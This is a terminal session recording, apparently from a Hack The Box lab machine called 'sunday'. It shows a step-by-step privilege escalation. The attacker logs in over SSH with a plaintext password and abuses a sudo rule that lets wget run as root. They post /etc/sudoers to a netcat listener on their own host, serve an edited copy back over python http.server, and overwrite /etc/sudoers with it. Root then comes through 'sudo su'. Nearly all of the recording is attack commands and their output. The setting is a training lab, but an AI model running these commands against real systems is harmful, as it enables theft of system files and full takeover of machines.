[58.378211, "o", "\u001b[51;99r\u001b[98;1H\u001b[K\r\n\u001b[K\u001b[2A\u001b[K\u001b[1;100r\u001b[64;5H\u001b[?12l\u001b[?25h\u001b[?25l\u001b[94m\u001b[51;1H┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[K\u001b[94m\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m nc -nvlp 4444 > sudoers_og\u001b[K\r\nNcat: Version 7.92 ( https://nmap.org/ncat )\u001b[K\r\nNcat: Listening on :::4444\u001b[K\r\nNcat: Listening on 0.0.0.0:4444\u001b[K\r\nNcat: Connection from 10.10.10.76.\u001b[K\r\nNcat: Connection from 10.10.10.76:33516.\u001b[K\r\n^C\u001b[K\u001b[94m\r\n┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[K\u001b[94m\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m cp sudoers_og sudoers\u001b[K\u001b[94m\r\n┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[K\u001b[94m\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m nano sudoers\u001b[K\u001b[94m\r\n┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[K\u001b[94m\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b"]
[58.378235, "o", "[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[64;5H"]
[59.654308, "o", "\u001b[?25l\u001b[50;1H───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[32m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[sudoers] \u001b[4m0:bash*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                      23:48\u001b(B\u001b[m\u001b[?12l\u001b[?25h"]
[59.654372, "o", "\u001b[64;5H"]
[59.82039, "o", "p"]
[60.058698, "o", "y"]
[60.16888, "o", "t"]
[60.261491, "o", "h"]
[60.333893, "o", "o"]
[60.454575, "o", "n"]
[60.506486, "o", "3"]
[60.664476, "o", " "]
[60.734684, "o", "-"]
[60.861434, "o", "m"]
[60.959082, "o", " "]
[61.361181, "o", "h"]
[61.491561, "o", "t"]
[61.621461, "o", "t"]
[61.696599, "o", "p"]
[61.89853, "o", "."]
[61.969159, "o", "s"]
[62.064531, "o", "e"]
[62.254636, "o", "r"]
[62.393786, "o", "v"]
[62.488073, "o", "e"]
[62.537319, "o", "r"]
[62.999735, "o", " "]
[63.093547, "o", "8"]
[63.156204, "o", "0"]
[63.407188, "o", "\r\n\u001b[?2004l"]
[63.478597, "o", "Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...\r\n"]
[64.209244, "o", "\u001b[?25l\u001b[16A\u001b[32m───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[39m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[sudoers] \u001b[4m0:python3*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                   23:48\u001b(B\u001b[m\u001b[?12l\u001b[?"]
[64.209382, "o", "25h\u001b[17;12H"]
[64.507468, "o", "\u001b[?25l\u001b[50;1H\u001b[32m───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[39m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[sudoers] \u001b[4m0:sshpass*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                   23:48\u001b(B\u001b[m\u001b[?12l\u001b"]
[64.507545, "o", "[?25h\u001b[17;12H"]
[68.178689, "o", "\u001b[?25l\u001b[94m\u001b[H┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[K\u001b[94m\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m sshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\u001b[K\r\nLast login: Sat Sep  3 15:45:22 2022 from 10.10.14.31\u001b[K\r\nOracle Corporation      SunOS 5.11      11.4    Aug 2018\u001b[K\r\n-bash-4.4$ sudo -l\u001b[K\r\nUser sammy may run the following commands on sunday:\u001b[K\r\n    (ALL) ALL\u001b[K\r\n    (root) NOPASSWD: /usr/bin/wget\u001b[K\r\n-bash-4.4$ sudo /usr/bin/wget --post-file=/etc/sudoers 10.10.14.31:4444\u001b[K\r\n--2022-09-03 15:47:29--  http://10.10.14.31:4444/\u001b[K\r\nConnecting to 10.10.14.31:4444... connected.\u001b[K\r\nHTTP request sent, awaiting response... No data received.\u001b[K\r\nRetrying.\u001b[K\r\n\u001b[K\r\n--2022-09-03 15:47:32--  (try: 2)  http://10.10.14.31:4444/ \u001b[K\r\nConnecting to 10.10.14.31:4444... failed: Connection refused.\u001b[K\u001b[30m\u001b[43m\r\n-bash-4.4$\u001b[39m\u001b[49m \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b["]
[68.179001, "o", "K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[33m───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[39m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[17;10H"]
[68.179329, "o", "\u001b[?25l\u001b[50;1H\u001b[33m───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[39m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[sudoers] \u001b[4m0:[tmux]*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                    23:48\u001b(B\u001b[m\u001b[?12l\u001b"]
[68.179493, "o", "[?25h\u001b[17;10H"]
[68.478967, "o", "\u001b]52;;LWJhc2gtNC40JA==\u0007\u001b[2C"]
[68.479597, "o", "\u001b[?25l\u001b[94m\u001b[H┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[K\u001b[94m\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m sshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\u001b[K\r\nLast login: Sat Sep  3 15:45:22 2022 from 10.10.14.31\u001b[K\r\nOracle Corporation      SunOS 5.11      11.4    Aug 2018\u001b[K\r\n-bash-4.4$ sudo -l\u001b[K\r\nUser sammy may run the following commands on sunday:\u001b[K\r\n    (ALL) ALL\u001b[K\r\n    (root) NOPASSWD: /usr/bin/wget\u001b[K\r\n-bash-4.4$ sudo /usr/bin/wget --post-file=/etc/sudoers 10.10.14.31:4444\u001b[K\r\n--2022-09-03 15:47:29--  http://10.10.14.31:4444/\u001b[K\r\nConnecting to 10.10.14.31:4444... connected.\u001b[K\r\nHTTP request sent, awaiting response... No data received.\u001b[K\r\nRetrying.\u001b[K\r\n\u001b[K\r\n--2022-09-03 15:47:32--  (try: 2)  http://10.10.14.31:4444/\u001b[K\r\nConnecting to 10.10.14.31:4444... failed: Connection refused.\u001b[K\r\n-bash-4.4$ \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K"]
[68.479729, "o", "\r\n\u001b[K\r\n\u001b[32m───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[39m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[17;12H"]
[68.520864, "o", "sudo /usr/bin/wget http://10.10.14.31/sudoers -O /etc/sudoers\r\n"]
[68.542793, "o", "--2022-09-03 15:48:14--  http://10.10.14.31/sudoers\r\nConnecting to 10.10.14.31:80... "]
[68.58067, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[68.585763, "o", "\u001b[66;1H10.10.10.76 - - [03/Sep/2022 23:48:09] \"GET /sudoers HTTP/1.1\" 200 -\u001b[20;41H"]
[68.627639, "o", "200 OK\r\nLength: 3293 (3.2K) [application/octet-stream]\r\nSaving to: '/etc/sudoers'\u001b[24;1H/etc/sudoers                                                 0%[                                                                                                                                         ]       0  --.-KB/s               "]
[68.628764, "o", "\r/etc/sudoers                                               100%[========================================================================================================================================>]   3.22K  --.-KB/s    in 0s      \u001b[26;1H2022-09-03 15:48:14 (21.0 MB/s) - '/etc/sudoers' saved [3293/3293]\u001b[28;1H"]
[68.63194, "o", "-bash-4.4$ "]
[70.003102, "o", "\u001b[?25l\u001b[50;1H\u001b[32m───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[39m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b(B\u001b[m\u001b[30m\u001b[42m\u001b[100;1H[sudoers] \u001b[4m0:sshpass*\u001b(B\u001b[m\u001b[30m\u001b[42m                                                                                                                                                                                                                   23:48\u001b(B\u001b[m\u001b[?12l\u001b"]
[70.003198, "o", "[?25h\u001b[28;12H"]
[70.045592, "o", "s"]
[70.153392, "o", "u"]
[70.317498, "o", "d"]
[70.419413, "o", "o"]
[70.561047, "o", " "]
[70.616662, "o", "-"]
[70.694794, "o", "l"]
[70.819295, "o", "\r\n"]
[70.82739, "o", "User sammy may run the following commands on sunday:\r\n    (ALL) ALL\r\n    (root) NOPASSWD: /usr/bin/wget\r\n    (root) NOPASSWD: /usr/bin/su\r\n-bash-4.4$ "]
[72.008085, "o", "s"]
[72.224993, "o", "u"]
[72.357214, "o", "d"]
[72.471627, "o", "o"]
[72.697577, "o", " "]
[72.849926, "o", "s"]
[72.959616, "o", "u"]
[73.508354, "o", "\r\n"]
[73.552826, "o", "root@sunday:/home/sammy# "]
[74.043147, "o", "i"]
[74.160532, "o", "d"]
[74.29544, "o", ";"]
[74.422515, "o", "w"]
[74.51872, "o", "h"]
[74.617504, "o", "o"]
[74.62869, "o", "p"]
[74.726907, "o", "a"]
[74.841594, "o", "m"]
[74.932256, "o", "i"]
[75.345936, "o", "\b \b"]
[75.484792, "o", "\b \b"]
[75.657054, "o", "\b \b"]
[75.791079, "o", "\b \b"]
[75.917989, "o", "a"]
[75.993419, "o", "m"]
[76.136921, "o", "i"]
[76.419497, "o", "\r\n"]
[76.423387, "o", "uid=0(root) gid=0(root)\r\n"]
[76.42556, "o", "root\r\n"]
[76.428357, "o", "root@sunday:/home/sammy# "]
[78.045776, "o", "\u001b[1;100r\u001b(B\u001b[m\u001b[?1l\u001b>\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?1006l\u001b[?1005l\u001b[?7727l\u001b[?1004l\u001b[?1049l\u001b[23;0;0t"]
[78.04599, "o", "[detached (from session sudoers)]\r\n"]
[78.046375, "o", "\u001b[?2004h\u001b]0;root@kali: ~/htb/sunday/10.10.10.76/loot/loot\u0007\u001b[;94m┌──(\u001b[1;31mroot💀kali\u001b[;94m)-[\u001b[0;1m~/htb/sunday/10.10.10.76/loot/loot\u001b[;94m]\r\r\n\u001b[;94m└─\u001b[1;31m#\u001b[0m "]
[79.407565, "o", "\u001b[?2004l\r\r\nexit\r\n"]
